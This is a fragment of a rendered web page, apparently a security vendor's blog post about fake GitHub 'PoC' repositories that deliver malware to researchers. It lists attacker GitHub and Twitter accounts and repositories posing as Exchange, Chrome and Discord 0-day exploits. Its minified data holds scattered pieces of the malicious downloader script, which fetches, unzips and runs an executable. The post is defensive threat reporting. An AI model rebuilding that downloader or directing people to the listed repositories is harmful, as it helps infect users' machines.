"},{type:a,tag:l,props:{href:"https:\u002F\u002Fblog.google\u002Fthreat-analysis-group\u002Fnew-campaign-targeting-security-researchers\u002F",rel:[m]},children:[{type:b,value:"Google TAG in January 2021"}]},{type:b,value:". Either way, security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing and don’t use anything you don’t understand."}]},{type:a,tag:p,props:{},children:[{type:b,value:"If you have engaged with any of the following accounts, consider the possibility that you’ve been compromised."}]},{type:a,tag:M,props:{id:al},children:[{type:b,value:am}]},{type:a,tag:N,props:{},children:[{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:an,rel:[m]},children:[{type:b,value:an}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:ao,rel:[m]},children:[{type:b,value:ao}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:ap,rel:[m]},children:[{type:b,value:ap}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aq,rel:[m]},children:[{type:b,value:aq}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:ar,rel:[m]},children:[{type:b,value:ar}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:as,rel:[m]},children:[{type:b,value:as}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:at,rel:[m]},children:[{type:b,value:at}]}]}]},{type:a,tag:M,props:{id:au},children:[{type:b,value:av}]},{type:a,tag:N,props:{},children:[{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aw,rel:[m]},children:[{type:b,value:aw}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:ax,rel:[m]},children:[{type:b,value:ax}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:ay,rel:[m]},children:[{type:b,value:ay}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:az,rel:[m]},children:[{type:b,value:az}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aA,rel:[m]},children:[{type:b,value:aA}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aB,rel:[m]},children:[{type:b,value:aB}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aC,rel:[m]},children:[{type:b,value:aC}]}]}]},{type:a,tag:M,props:{id:aD},children:[{type:b,value:aE}]},{type:a,tag:N,props:{},children:[{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aF,rel:[m]},children:[{type:b,value:aF}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aG,rel:[m]},children:[{type:b,value:aG}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aH,rel:[m]},children:[{type:b,value:aH}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aI,rel:[m]},children:[{type:b,value:aI}]}]}]},{type:a,tag:"style",children:[{type:b,value:".ct-794887{color:#CF222E;}\n.dark .ct-794887{color:#FF7B72;}\n.sepia .ct-794887{color:#F92672;}\n.ct-836158{color:#24292F;}\n.dark .ct-836158{color:#C9D1D9;}\n.sepia .ct-836158{color:#F8F8F2;}\n.ct-869604{color:#0550AE;}\n.dark .ct-869604{color:#79C0FF;}\n.sepia .ct-869604{color:#F8F8F2;}\n.ct-169668{color:#0A3069;}\n.dark .ct-169668{color:#A5D6FF;}\n.sepia .ct-169668{color:#E6DB74;}\n.ct-363298{color:#0550AE;}\n.dark .ct-363298{color:#79C0FF;}\n.sepia .ct-363298{color:#66D9EF;}\n.ct-402719{color:#953800;}\n.dark .ct-402719{color:#FFA657;}\n.sepia .ct-402719{color:#FD971F;font-style:italic;}\n.ct-854774{color:#CF222E;}\n.dark .ct-854774{color:#FF7B72;}\n.sepia .ct-854774{color:#66D9EF;font-style:italic;}\n.ct-360247{color:#0550AE;}\n.dark .ct-360247{color:#79C0FF;}\n.sepia .ct-360247{color:#AE81FF;}"}]}],toc:{title:r,searchDepth:H,depth:H,links:[{id:al,depth:D,text:am},{id:au,depth:D,text:av},{id:aD,depth:D,text:aE}]}},_type:"markdown",_id:"content:blog:fake-repos-deliver-malicious-implant.md",_source:"content",_file:"blog\u002Ffake-repos-deliver-malicious-implant.md",_extension:"md"}},state:{"$scolor-mode":{preference:aJ,value:aJ,unknown:O,forced:f},$snotifications:[],$sicons:{"bx:bx-menu":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M4 6h16v2H4zm0 5h16v2H4zm0 5h16v2H4z\"\u002F\u003E"},"mdi:database-search":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M18.68 12.32a4.49 4.49 0 0 0-6.36.01a4.49 4.49 0 0 0 0 6.36a4.508 4.508 0 0 0 5.57.63L21 22.39L22.39 21l-3.09-3.11c1.13-1.77.87-4.09-.62-5.57m-1.41 4.95c-.98.98-2.56.97-3.54 0c-.97-.98-.97-2.56.01-3.54c.97-.97 2.55-.97 3.53 0c.97.98.97 2.56 0 3.54M10.9 20.1a6.527 6.527 0 0 1-1.48-2.32C6.27 17.25 4 15.76 4 14v3c0 2.21 3.58 4 8 4c-.4-.26-.77-.56-1.1-.9M4 9v3c0 1.68 2.07 3.12 5 3.7v-.2c0-.93.2-1.85.58-2.69C6.34 12.3 4 10.79 4 9m8-6C7.58 3 4 4.79 4 7c0 2 3 3.68 6.85 4h.05c1.2-1.26 2.86-2 4.6-2c.91 0 1.81.19 2.64.56A3.215 3.215 0 0 0 20 7c0-2.21-3.58-4-8-4Z\"\u002F\u003E"},"bxs:skull":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M12 2C5.505 2 2 6.637 2 11c0 2.129 1.009 3.979 3 5.508V21h3v-3h2v3h4v-3h2v3h3v-4.493c1.991-1.528 3-3.379 3-5.507c0-4.363-3.505-9-10-9zM8 13c-1.121 0-2-1.098-2-2.5S6.879 8 8 8s2 1.098 2 2.5S9.121 13 8 13zm8 0c-1.121 0-2-1.098-2-2.5S14.879 8 16 8s2 1.098 2 2.5s-.879 2.5-2 2.5z\"\u002F\u003E"},"mdi:door-open":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M12 3c-1.11 0-2 .89-2 2H3v14H2v2h20v-2h-1V5c0-1.11-.89-2-2-2h-7m0 2h7v14h-7V5m-7 6h2v2H5v-2Z\"\u002F\u003E"},"ri:team-line":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M12 11a5 5 0 0 1 5 5v6h-2v-6a3 3 0 0 0-2.824-2.995L12 13a3 3 0 0 0-2.995 2.824L9 16v6H7v-6a5 5 0 0 1 5-5Zm-6.5 3c.279 0 .55.033.81.094a5.948 5.948 0 0 0-.301 1.575L6 16v.086a1.493 1.493 0 0 0-.356-.08L5.5 16a1.5 1.5 0 0 0-1.493 1.355L4 17.5V22H2v-4.5A3.5 3.5 0 0 1 5.5 14Zm13 0a3.5 3.5 0 0 1 3.5 3.5V22h-2v-4.5a1.5 1.5 0 0 0-1.355-1.493L18.5 16c-.175 0-.343.03-.5.085V16c0-.666-.108-1.306-.308-1.904c.258-.063.53-.096.808-.096Zm-13-6a2.5 2.5 0 1 1 0 5a2.5 2.5 0 0 1 0-5Zm13 0a2.5 2.5 0 1 1 0 5a2.5 2.5 0 0 1 0-5Zm-13 2a.5.5 0 1 0 0 1a.5.5 0 0 0 0-1Zm13 0a.5.5 0 1 0 0 1a.5.5 0 0 0 0-1ZM12 2a4 4 0 1 1 0 8a4 4 0 0 1 0-8Zm0 2a2 2 0 1 0 0 4a2 2 0 0 0 0-4Z\"\u002F\u003E"},"material-symbols:breaking-news-alt-1":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M6 17h5v-2H6v2Zm10 0h2v-2h-2v2ZM6 13h5v-2H6v2Zm10 0h2V7h-2v6ZM6 9h5V7H6v2ZM4 21q-.825 0-1.413-.588T2 19V5q0-.825.588-1.413T4 3h16q.825 0 1.413.588T22 5v14q0 .825-.588 1.413T20 21H4Z\"\u002F\u003E"},"mdi:newspaper-variant-outline":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M20 5v14H4V5h16m0-2H4c-1.11 0-2 .89-2 2v14c0 1.11.89 2 2 2h16c1.11 0 2-.89 2-2V5c0-1.11-.89-2-2-2m-2 12H6v2h12v-2m-8-8H6v6h4V7m2 2h6V7h-6v2m6 2h-6v2h6v-2Z\"\u002F\u003E"},"material-symbols:newspaper":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M4 21q-.825 0-1.413-.588T2 19V3l1.675 1.675L5.325 3L7 4.675L8.675 3l1.65 1.675L12 3l1.675 1.675L15.325 3L17 4.675L18.675 3l1.65 1.675L22 3v16q0 .825-.587 1.413T20 21H4Zm0-2h7v-6H4v6Zm9 0h7v-2h-7v2Zm0-4h7v-2h-7v2Zm-9-4h16V8H4v3Z\"\u002F\u003E"},"ic:baseline-event-note":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M17 10H7v2h10v-2zm2-7h-1V1h-2v2H8V1H6v2H5c-1.11 0-1.99.9-1.99 2L3 19a2 2 0 0 0 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm0 16H5V8h14v11zm-5-5H7v2h7v-2z\"\u002F\u003E"},"mdi:document":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath d=\"M5 3h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2zm2 4v2h10V7H7zm0 4v2h10v-2H7zm0 4v2h7v-2H7z\" fill=\"currentColor\"\u002F\u003E",hidden:O},"mdi:code-json":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M5 3h2v2H5v5a2 2 0 0 1-2 2a2 2 0 0 1 2 2v5h2v2H5c-1.07-.27-2-.9-2-2v-4a2 2 0 0 0-2-2H0v-2h1a2 2 0 0 0 2-2V5a2 2 0 0 1 2-2m14 0a2 2 0 0 1 2 2v4a2 2 0 0 0 2 2h1v2h-1a2 2 0 0 0-2 2v4a2 2 0 0 1-2 2h-2v-2h2v-5a2 2 0 0 1 2-2a2 2 0 0 1-2-2V5h-2V3h2m-7 12a1 1 0 0 1 1 1a1 1 0 0 1-1 1a1 1 0 0 1-1-1a1 1 0 0 1 1-1m-4 0a1 1 0 0 1 1 1a1 1 0 0 1-1 1a1 1 0 0 1-1-1a1 1 0 0 1 1-1m8 0a1 1 0 0 1 1 1a1 1 0 0 1-1 1a1 1 0 0 1-1-1a1 1 0 0 1 1-1Z\"\u002F\u003E"},"ic:baseline-menu-book":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M21 5c-1.11-.35-2.33-.5-3.5-.5c-1.95 0-4.05.4-5.5 1.5c-1.45-1.1-3.55-1.5-5.5-1.5S2.45 4.9 1 6v14.65c0 .25.25.5.5.5c.1 0 .15-.05.25-.05C3.1 20.45 5.05 20 6.5 20c1.95 0 4.05.4 5.5 1.5c1.35-.85 3.8-1.5 5.5-1.5c1.65 0 3.35.3 4.75 1.05c.1.05.15.05.25.05c.25 0 .5-.25.5-.5V6c-.6-.45-1.25-.75-2-1zm0 13.5c-1.1-.35-2.3-.5-3.5-.5c-1.7 0-4.15.65-5.5 1.5V8c1.35-.85 3.8-1.5 5.5-1.5c1.2 0 2.4.15 3.5.5v11.5z\"\u002F\u003E\u003Cpath fill=\"currentColor\" d=\"M17.5 10.5c.88 0 1.73.09 2.5.26V9.24c-.79-.15-1.64-.24-2.5-.24c-1.7 0-3.24.29-4.5.83v1.66c1.13-.64 2.7-.99 4.5-.99zM13 12.49v1.66c1.13-.64 2.7-.99 4.5-.99c.88 0 1.73.09 2.5.26V11.9c-.79-.15-1.64-.24-2.5-.24c-1.7 0-3.24.3-4.5.83zm4.5 1.84c-1.7 0-3.24.29-4.5.83v1.66c1.13-.64 2.7-.99 4.5-.99c.88 0 1.73.09 2.5.26v-1.52c-.79-.16-1.64-.24-2.5-.24z\"\u002F\u003E"},"ic:round-support":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10s10-4.48 10-10S17.52 2 12 2zm7.46 7.12l-2.78 1.15a4.982 4.982 0 0 0-2.95-2.94l1.15-2.78c2.1.8 3.77 2.47 4.58 4.57zM12 15c-1.66 0-3-1.34-3-3s1.34-3 3-3s3 1.34 3 3s-1.34 3-3 3zM9.13 4.54l1.17 2.78a5 5 0 0 0-2.98 2.97L4.54 9.13a7.984 7.984 0 0 1 4.59-4.59zM4.54 14.87l2.78-1.15a4.968 4.968 0 0 0 2.97 2.96l-1.17 2.78a7.996 7.996 0 0 1-4.58-4.59zm10.34 4.59l-1.15-2.78a4.978 4.978 0 0 0 2.95-2.97l2.78 1.17a8.007 8.007 0 0 1-4.58 4.58z\"\u002F\u003E"},"mdi:chemical-weapon":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M11 7.83A3 3 0 0 1 9 5a3 3 0 0 1 3-3a3 3 0 0 1 3 3c0 1.31-.84 2.42-2 2.83v2.81a3.66 3.66 0 0 0-2 0V7.83m7.3 13.27a2.989 2.989 0 0 1-1.46-3.14l-2.44-1.41c.48-.46.84-1.05 1-1.73l2.44 1.41c.94-.81 2.32-.97 3.45-.32c1.44.83 1.93 2.66 1.1 4.09a2.987 2.987 0 0 1-4.09 1.1M2.7 15.9c1.13-.65 2.51-.48 3.45.32l2.45-1.41c.16.69.51 1.27 1 1.73l-2.45 1.41c.23 1.22-.32 2.5-1.45 3.15c-1.44.83-3.27.34-4.1-1.1a2.999 2.999 0 0 1 1.1-4.1M14 14a2 2 0 0 1-2 2a2 2 0 0 1-2-2a2 2 0 0 1 2-2a2 2 0 0 1 2 2m3 0l-.03.57l-1.47-.86c-.1-1.07-.67-2-1.5-2.59V9.41c1.77.78 3 2.54 3 4.59m-2.03 4.03c-.83.61-1.86.97-2.97.97s-2.14-.36-2.97-1l1.47-.83c.46.21.97.33 1.5.33s1.03-.12 1.5-.33l1.47.86m-7.94-3.47L7 14c0-2.05 1.23-3.81 3-4.58v1.71c-.83.58-1.4 1.51-1.5 2.57l-1.47.86Z\"\u002F\u003E"},"grommet-icons:vulnerability":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"none\" stroke=\"currentColor\" stroke-width=\"2\" d=\"M12 0v24V0ZM0 12h24H0Zm17 0c0-2.757-2.243-5-5-5s-5 2.243-5 5s2.243 5 5 5s5-2.243 5-5Zm-5 9c-4.962 0-9-4.037-9-9s4.038-9 9-9s9 4.037 9 9s-4.038 9-9 9Z\"\u002F\u003E"},"material-symbols:add-moderator-rounded":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M16.5 17.5v2q0 .2.15.35T17 20q.2 0 .35-.15t.15-.35v-2h2q.2 0 .35-.15T20 17q0-.2-.15-.35t-.35-.15h-2v-2q0-.2-.15-.35T17 14q-.2 0-.35.15t-.15.35v2h-2q-.2 0-.35.15T14 17q0 .2.15.35t.35.15h2ZM17 22q-2.075 0-3.538-1.463T12 17q0-2.075 1.463-3.538T17 12q2.075 0 3.538 1.463T22 17q0 2.075-1.463 3.538T17 22Zm-5 0q-3.475-.875-5.738-3.988T4 11.1V6.375q0-.625.363-1.125t.937-.725l6-2.25q.35-.125.7-.125t.7.125l6 2.25q.575.225.938.725T20 6.375v4.3q-.65-.325-1.463-.5T17 10q-2.9 0-4.95 2.05T10 17q0 1.55.588 2.8t1.487 2.175q-.025 0-.037.013T12 22Z\"\u002F\u003E"},"carbon:vpn-policy":{left:e,top:e,width:z,height:z,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M30 15a6 6 0 1 0-10 4.46V29l4-1.884L28 29v-9.54A5.98 5.98 0 0 0 30 15Zm-4 10.848l-2-.942l-2 .942V20.65a5.888 5.888 0 0 0 4 0ZM24 19a4 4 0 1 1 4-4a4.005 4.005 0 0 1-4 4Z\"\u002F\u003E\u003Cpath fill=\"currentColor\" d=\"M14 2a6.007 6.007 0 0 0-6 6v6H6a2.002 2.002 0 0 0-2 2v12a2.002 2.002 0 0 0 2 2h11v-2H6V16h9v-2h-5V8a4 4 0 0 1 7.92-.8l1.96-.4A6.017 6.017 0 0 0 14 2Z\"\u002F\u003E"},"carbon:policy":{left:e,top:e,width:z,height:z,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M30 18a6 6 0 1 0-10 4.46V30l4-1.893L28 30v-7.54A5.98 5.98 0 0 0 30 18zm-4 8.84l-2-.947l-2 .947v-3.19a5.888 5.888 0 0 0 4 0zM24 22a4 4 0 1 1 4-4a4.005 4.005 0 0 1-4 4zM9 14h7v2H9zm0-6h10v2H9z\"\u002F\u003E\u003Cpath fill=\"currentColor\" d=\"M6 30a2.002 2.002 0 0 1-2-2V4a2.002 2.002 0 0 1 2-2h16a2.002 2.002 0 0 1 2 2v4h-2V4H6v24h10v2Z\"\u002F\u003E"},"icon-park-outline:agreement":{left:e,top:e,width:aK,height:aK,rotate:e,vFlip:f,hFlip:f,body:"\u003Cg fill=\"none\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-width=\"4\"\u003E\u003Crect width=\"32\" height=\"40\" x=\"8\" y=\"4\" stroke-linejoin=\"round\" rx=\"2\"\u002F\u003E\u003Cpath stroke-linejoin=\"round\" d=\"M16 4h9v16l-4.5-4l-4.5 4V4Z\"\u002F\u003E\u003Cpath d=\"M16 28h10m-10 6h16\"\u002F\u003E\u003C\u002Fg\u003E"},"mdi:chevron-left":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M15.41 16.58L10.83 12l4.58-4.59L14 6l-6 6l6 6l1.41-1.42Z\"\u002F\u003E"},"mdi:check-bold":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"m9 20.42l-6.21-6.21l2.83-2.83L9 14.77l9.88-9.89l2.83 2.83L9 20.42Z\"\u002F\u003E"}}},_errors:{"content-query-C5tE1t07Tq":null},serverRendered:O,config:{public:{webURL:"https:\u002F\u002Fvulncheck.com",apiURL:"https:\u002F\u002Fapi.vulncheck.com",appEnv:"production",content:{locales:[],defaultLocale:r,integrity:1687646805393,experimental:{stripQueryParameters:f,clientDB:f},api:{baseURL:"\u002Fapi\u002F_content"},navigation:{fields:[]},tags:{p:"prose-p",a:"prose-a",blockquote:"prose-blockquote","code-inline":"prose-code-inline",code:"prose-code",em:"prose-em",h1:"prose-h1",h2:"prose-h2",h3:"prose-h3",h4:"prose-h4",h5:"prose-h5",h6:"prose-h6",hr:"prose-hr",img:"prose-img",ul:"prose-ul",ol:"prose-ol",li:"prose-li",strong:"prose-strong",table:"prose-table",thead:"prose-thead",tbody:"prose-tbody",td:"prose-td",th:"prose-th",tr:"prose-tr"},highlight:{preload:[T,"c","xml","java","php"],theme:{default:"github-light",dark:"github-dark",sepia:"monokai"}},wsUrl:r,documentDriven:f,host:r,trailingSlash:f,anchorLinks:{depth:X,exclude:[U]}}},app:{baseURL:"\u002F",buildAssetsDir:"\u002F_nuxt\u002F",cdnURL:r}}}}("element","text","span","ct-836158",0,false,"ct-794887","ct-169668",24,"line"," ","a","nofollow","li","=","p","+","","ct-360247","\"\u002Fhome\u002F\""," os.environ[","\"USERNAME\"","] ","\"\u002F.local\u002Fshare\"",":\n",32,"img","code-inline","if",3,"'TMP'",")\n","ct-402719",2,"        ","            ","\n",", ","h3","ol",true,"blog","Repo Layout","poc.py","code","python",1,"==","    ",4,"not","], name, name ","\".exe\"","with","ct-363298","open","(des, ","'wb'",") ","as"," f: f.write(urllib.request.urlopen(url).read())\n"," ZipFile(des, ","'r'","|","subprocess.","github-accounts","GitHub Accounts","https:\u002F\u002Fgithub.com\u002FAKuzmanHSCS","https:\u002F\u002Fgithub.com\u002FRShahHSCS","https:\u002F\u002Fgithub.com\u002FBAdithyaHSCS","https:\u002F\u002Fgithub.com\u002FDLandonHSCS","https:\u002F\u002Fgithub.com\u002FMHadzicHSCS","https:\u002F\u002Fgithub.com\u002FGSandersonHSCS","https:\u002F\u002Fgithub.com\u002FSSankkarHSCS","malicious-repositories","Malicious Repositories","https:\u002F\u002Fgithub.com\u002FAKuzmanHSCS\u002FMicrosoft-Exchange-RCE","https:\u002F\u002Fgithub.com\u002FMHadzicHSCS\u002FChrome-0-day","https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix","https:\u002F\u002Fgithub.com\u002FBAdithyaHSCS\u002FExchange-0-Day","https:\u002F\u002Fgithub.com\u002FRShahHSCS\u002FDiscord-0-Day-Exploit","https:\u002F\u002Fgithub.com\u002FDLandonHSCS\u002FDiscord-RCE","https:\u002F\u002Fgithub.com\u002FSSankkarHSCS\u002FChromium-0-Day","twitter-accounts","Twitter Accounts","https:\u002F\u002Ftwitter.com\u002FAKuzmanHSCS","https:\u002F\u002Ftwitter.com\u002FDLandonHSCS","https:\u002F\u002Ftwitter.com\u002FGSandersonHSCS","https:\u002F\u002Ftwitter.com\u002FMHadzicHSCS","system",48))</script><script type="module" src="/_nuxt/entry.cda04c5a.js" crossorigin></script></body>
</html>